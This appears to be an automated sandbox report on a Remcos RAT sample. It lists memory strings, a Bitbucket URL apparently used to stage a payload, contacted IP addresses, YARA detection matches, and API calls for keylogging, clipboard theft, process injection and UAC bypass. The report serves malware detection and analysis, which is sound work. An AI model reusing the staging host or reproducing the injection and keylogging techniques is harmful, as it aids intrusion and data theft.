Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe, SndVol.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: D2pQ4J4GGZ.exe, D2pQ4J4GGZ.exe, 00000000.00000002.2175474410.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2149724742.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2150540153.00000000029EE000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032389922.000000007FB1F000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2032127390.00000000024C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: D2pQ4J4GGZ.exe, 00000000.00000003.2130559625.00000000007E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e11a-
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/g9g
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/0d838bb6-e
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000076D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.00000000207AD000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2164833746.0000000020717000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidj
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.000000000071E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/250_Vjrsafyhidjp
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2147688027.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: D2pQ4J4GGZ.exe, 00000000.00000002.2173590906.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108744484.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, D2pQ4J4GGZ.exe, 00000000.00000003.2108137542.000000007ED20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.29.78:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CA2F3 SetWindowsHookExA 0000000D,027CA2DF,00000000 8_2_027CA2F3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CB749 OpenClipboard,GetClipboardData,CloseClipboard, 8_2_027CB749
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_027D68FC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027D68FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 11_2_027D68FC
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 13_2_028168FC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CB749 OpenClipboard,GetClipboardData,CloseClipboard, 8_2_027CB749
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027CA41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 8_2_027CA41B
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2349013309.000000001B1D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2240779632.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491250282.0000000000528000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027DCA73 SystemParametersInfoW, 8_2_027DCA73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027DCA73 SystemParametersInfoW, 11_2_027DCA73
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_0281CA73 SystemParametersInfoW, 13_2_0281CA73

System Summary

Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.SndVol.exe.2800000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 13.2.SndVol.exe.2800000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.colorcpl.exe.27c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.D2pQ4J4GGZ.exe.29c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000D.00000002.2322085295.0000000002800000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.2240919016.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.2170737614.000000007EAA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.2150744964.0000000002A47000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.4491421481.00000000027C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: D2pQ4J4GGZ.exe PID: 6804, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 5804, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 2964, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 6608, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D8730 NtQueueApcThread, 0_2_029D8730
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D7A2C NtAllocateVirtualMemory, 0_2_029D7A2C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_029DDC8C
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_029DDC04
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D7D78 NtWriteVirtualMemory, 0_2_029D7D78
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_029DDD70
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D8D70 GetThreadContext,SetThreadContext,NtResumeThread, 0_2_029D8D70
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D8D6E GetThreadContext,SetThreadContext,NtResumeThread, 0_2_029D8D6E
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D7A2A NtAllocateVirtualMemory, 0_2_029D7A2A
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029DDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_029DDBB0
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 10_2_02A38730 NtQueueApcThread, 10_2_02A38730
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 10_2_02A37A2C NtAllocateVirtualMemory, 10_2_02A37A2C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 10_2_02A3DD70 NtOpenFile,NtReadFile,NtClose, 10_2_02A3DD70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 10_2_02A37D78 NtWriteVirtualMemory, 10_2_02A37D78
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 10_2_02A37A2A NtAllocateVirtualMemory, 10_2_02A37A2A
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029B8730 NtQueueApcThread, 12_2_029B8730
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029B7A2C NtAllocateVirtualMemory, 12_2_029B7A2C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029B7D78 NtWriteVirtualMemory, 12_2_029B7D78
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 12_2_029BDD70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029B7A2A NtAllocateVirtualMemory, 12_2_029B7A2A
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029BDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 12_2_029BDBB0
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029BDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, 12_2_029BDC8C
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029BDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 12_2_029BDC04
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029B8D70 GetThreadContext,SetThreadContext,NtResumeThread, 12_2_029B8D70
Source: C:\Users\Public\Libraries\Vjrsafyh.PIF Code function: 12_2_029B8D6E GetThreadContext,SetThreadContext,NtResumeThread, 12_2_029B8D6E
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029D8788 CreateProcessAsUserW, 0_2_029D8788
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_027D67EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 8_2_027D67EF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_027D67EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 11_2_027D67EF
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 13_2_028167EF ExitWindowsEx,LoadLibraryA,GetProcAddress, 13_2_028167EF
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_029C20C4 0_2_029C20C4
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A6671B 0_2_02A6671B
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A6E42F 0_2_02A6E42F
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A7E5FA 0_2_02A7E5FA
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A6E9BE 0_2_02A6E9BE
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A9A93B 0_2_02A9A93B
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A94FD9 0_2_02A94FD9
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A7AF67 0_2_02A7AF67
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A6F067 0_2_02A6F067
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A65183 0_2_02A65183
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A6F1D0 0_2_02A6F1D0
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A856AC 0_2_02A856AC
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A9B769 0_2_02A9B769
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A8547D 0_2_02A8547D
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A5B595 0_2_02A5B595
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A85B38 0_2_02A85B38
Source: C:\Users\user\Desktop\D2pQ4J4GGZ.exe Code function: 0_2_02A858DB 0_2_02A858DB
